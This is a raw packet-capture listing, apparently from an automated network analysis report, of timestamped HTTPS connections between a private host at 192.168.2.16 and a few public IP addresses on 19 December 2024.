                                                                                                                  Dec 19, 2024 11:42:56.919097900 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.919163942 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.919183969 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.919207096 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.919256926 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.926219940 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.933178902 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.933250904 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.933271885 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.940285921 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.940361023 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.940378904 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.947197914 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.947271109 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.947293043 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.947343111 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:56.947396040 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.947551966 CET49727443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:56.947567940 CET44349727104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.771737099 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.772099972 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:57.772196054 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.772545099 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.772861004 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:57.772933960 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.773004055 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:57.819331884 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.922709942 CET4968080192.168.2.16192.229.211.108
                                                                                                                  Dec 19, 2024 11:42:57.981102943 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.981411934 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:57.981436014 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.982615948 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.982939959 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:57.983078003 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:57.983083963 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:57.983122110 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.034689903 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.213232994 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.213287115 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.213314056 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.213340998 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.213373899 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.213427067 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.213428020 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.213500977 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.213552952 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.213926077 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.221225977 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.221292973 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.221313953 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.237775087 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.237874031 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.237894058 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.290697098 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.332987070 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.385766029 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.385839939 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.409001112 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.409106016 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.409143925 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.417927980 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.417974949 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.418008089 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.418032885 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.418081999 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.422301054 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.422394037 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.422457933 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.423154116 CET49729443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.423188925 CET44349729104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.424151897 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.425796986 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:58.425841093 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.425952911 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:58.426186085 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:58.426204920 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.431982040 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.432044983 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.432064056 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.439793110 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.439891100 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.439903975 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.447638035 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.447719097 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.447731972 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.455420971 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.455570936 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.455622911 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.463222980 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.463318110 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.463339090 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.478017092 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.478068113 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.478116035 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.478158951 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.478204012 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.484949112 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.491921902 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.491986036 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.491993904 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.492017031 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.492054939 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.525451899 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.577749014 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.596793890 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.600017071 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.600105047 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.600123882 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.600151062 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.600188971 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.605298996 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.615080118 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.615184069 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.615207911 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.615252018 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.618978024 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.618987083 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.619097948 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.623866081 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.623956919 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.632158041 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.632169008 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.632247925 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.636192083 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.636322975 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.644792080 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.644896984 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.653225899 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.653330088 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.660747051 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.660865068 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.664134026 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.664207935 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.670500040 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.670574903 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.673954964 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.674021959 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.681166887 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.681422949 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.790199041 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.790332079 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.795383930 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.795481920 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.798063993 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.798141003 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.800487041 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.800561905 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.800587893 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.800615072 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.800683975 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.800683975 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.800704002 CET44349728104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.800751925 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.800751925 CET49728443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:58.803503036 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:58.803551912 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:58.803663015 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:58.803908110 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:58.803920031 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.637078047 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.637778997 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:59.637813091 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.638272047 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.638807058 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:59.638890028 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.638987064 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:42:59.679330111 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.759347916 CET44349718142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.759445906 CET44349718142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.759505033 CET49718443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:42:59.910037994 CET49718443192.168.2.16142.250.181.100
                                                                                                                  Dec 19, 2024 11:42:59.910077095 CET44349718142.250.181.100192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.910598040 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:59.910638094 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:42:59.910736084 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:59.911155939 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:42:59.911169052 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.013665915 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.014827967 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.014857054 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.015206099 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.017110109 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.017256975 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.017319918 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.061760902 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.079065084 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.079159021 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.079216003 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.080265999 CET49730443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.080288887 CET44349730104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.452621937 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.452661991 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.452706099 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.452724934 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.453203917 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.453229904 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.453250885 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.453263044 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.453299046 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.453931093 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.460957050 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.461010933 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.461025953 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.469391108 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.469444036 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.469460011 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.523700953 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.572427988 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.619704008 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.619718075 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.647200108 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.647274017 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.647284985 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.655009985 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.655072927 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.655081034 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.662864923 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.662944078 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.662967920 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.670591116 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.670689106 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.670712948 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.686162949 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.686233997 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.686238050 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.686264992 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.686307907 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.694040060 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.701782942 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.701838970 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.701849937 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.709551096 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.709614992 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.709621906 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.716603994 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.716691017 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.716697931 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.723720074 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.723783970 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.723790884 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.730638981 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.730699062 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.730705976 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.737576962 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.737656116 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.737663984 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.779697895 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.837405920 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.839458942 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.839759111 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.839786053 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.844079018 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.844139099 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.844146967 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.853086948 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.853159904 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.853168011 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.853220940 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.862025023 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.862050056 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.862096071 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.862138987 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.862185955 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.870349884 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.870373011 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.870426893 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.878588915 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.878678083 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.882788897 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.882859945 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.891055107 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.891124010 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.899162054 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.899235010 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.903417110 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.903476000 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.911714077 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.911781073 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.919807911 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.919867039 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:00.924069881 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:00.924134016 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.029438972 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.029545069 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.035232067 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.035298109 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.038386106 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.038465023 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.044641972 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.044703007 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.044719934 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.044735909 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.044785023 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.044795990 CET44349731104.18.95.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.044806957 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.044806957 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.044833899 CET49731443192.168.2.16104.18.95.41
                                                                                                                  Dec 19, 2024 11:43:01.133667946 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.133989096 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.134016991 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.135173082 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.135560989 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.135735035 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.135740042 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.135777950 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.135850906 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.177700043 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.620024920 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.620145082 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.620208979 CET49732443192.168.2.16104.18.94.41
                                                                                                                  Dec 19, 2024 11:43:01.620276928 CET44349732104.18.94.41192.168.2.16
                                                                                                                  Dec 19, 2024 11:43:01.620373964 CET44349732104.18.94.41192.168.2.16
